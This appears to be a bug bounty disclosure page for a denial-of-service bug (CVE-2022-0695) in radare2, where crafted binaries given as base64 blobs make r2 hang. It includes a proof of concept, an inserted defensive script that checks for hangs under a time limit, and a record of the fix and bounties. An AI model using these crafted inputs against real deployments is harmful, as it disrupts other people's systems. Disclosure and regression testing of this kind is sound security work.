Denial of Service in radareorg/radare2

Valid

Reported on

Feb 23rd 2022


Description

R2 will hang for several crafted binaries.

Proof of Concept

printf "%s" "AAA4AAAAAB4=" | base64 -d > /tmp/a
# printf "%s" "z/rt/gwAAAEuAAB//wAAAACe2QEaAAAG+s8yAOH/AQAAAA==" | base64 -d > /tmp/a
# printf "%s" "zvrt/gCd7QBMYWT6AAD6/2NiQGsOAAGbuAAAADQAAID7AAAAAAEAAAEBZWUgcmR4LCByY3gBHQAAABEAAAAB/wAA7wABAAFiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiY2JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi/3///2KdYmJidmJiZc767QIA/38BAAr/7n/WAc767QAAAgD2AB0AABAFAAAVAQAAAAHv7+/v7+/v7+/v729jYWwvc2hhcmUvcmFkYXJlMi9wZGJ4QAAAAAQAAAEBYmVxPwCQHckEAAAAANBEyQR6ABQAkETJBAAAAAAhAAAAAAIAAAAQAAIAAAAQEAAAEgAAAAEAAABlYXhAKysBAA==" | base64 -d > /tmp/a
r2 /tmp/a # This hangs forever.

Impact

This vulnerability is capable of denial of service locally.

Occurrences

This line is never satisfied.
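A regression check for hangs like the one in the proof of concept above, as an added example that is not part of the original report or the radare2 code base: each sample file is opened under a hard time limit and the outcome is classified. It assumes GNU coreutils `timeout` and the batch invocation `r2 -q -c q`; `PARSER_CMD`, `LIMIT`, `classify_run` and `scan_dir` are hypothetical names chosen for this example.

```shell
#!/bin/sh
# Added example: triage parser hangs with a hard time limit.
# Assumptions: GNU coreutils `timeout` is installed; PARSER_CMD and LIMIT
# are hypothetical knobs for this script, not radare2 settings.
PARSER_CMD=${PARSER_CMD:-"r2 -q -c q"}   # load the file, run `q`, exit
LIMIT=${LIMIT:-10}                       # seconds before a run counts as a hang

# classify_run FILE -> prints ok | hang | crash | error
classify_run() {
    rc=0
    # stdin comes from /dev/null so the tool can never wait at a prompt;
    # -k 2 escalates to SIGKILL if SIGTERM is ignored.
    # $PARSER_CMD is left unquoted on purpose so it splits into words.
    timeout -k 2 "$LIMIT" $PARSER_CMD "$1" </dev/null >/dev/null 2>&1 || rc=$?
    if [ "$rc" -eq 0 ]; then echo ok
    elif [ "$rc" -eq 124 ] || [ "$rc" -eq 137 ]; then echo hang   # timed out or SIGKILLed
    elif [ "$rc" -gt 128 ]; then echo crash                        # died on a signal
    else echo error                                                # tool reported failure
    fi
}

# scan_dir DIR -> one "verdict<TAB>path" line per file;
# returns 1 if any file caused a hang or a crash, 0 otherwise.
scan_dir() {
    bad=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        verdict=$(classify_run "$f")
        printf '%s\t%s\n' "$verdict" "$f"
        case $verdict in hang|crash) bad=1 ;; esac
    done
    return "$bad"
}

# Run as a script: ./hangcheck.sh DIR
if [ "$#" -gt 0 ]; then scan_dir "$1"; fi
```

Pointing `scan_dir` at a directory holding the decoded `/tmp/a` sample should report `hang` on a build without the fix and a different verdict once the fix is in.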

We are processing your report and will contact the radareorg/radare2 team within 24 hours. 3 months ago
lazymio modified the report
3 months ago
lazymio modified the report
3 months ago
pancake validated this vulnerability 3 months ago
lazymio has been awarded the disclosure bounty
The fix bounty is now up for grabs
lazymio
3 months ago

Researcher


@pancake Thanks!

@admin I would like to request a CVE for this disclosure. : )

pancake confirmed that a fix has been merged on 634b88 3 months ago
pancake has been awarded the fix bounty
bin_qnx.c#L75 has been validated
Jamie Slome
3 months ago

Admin


Sorted! CVE-2022-0695
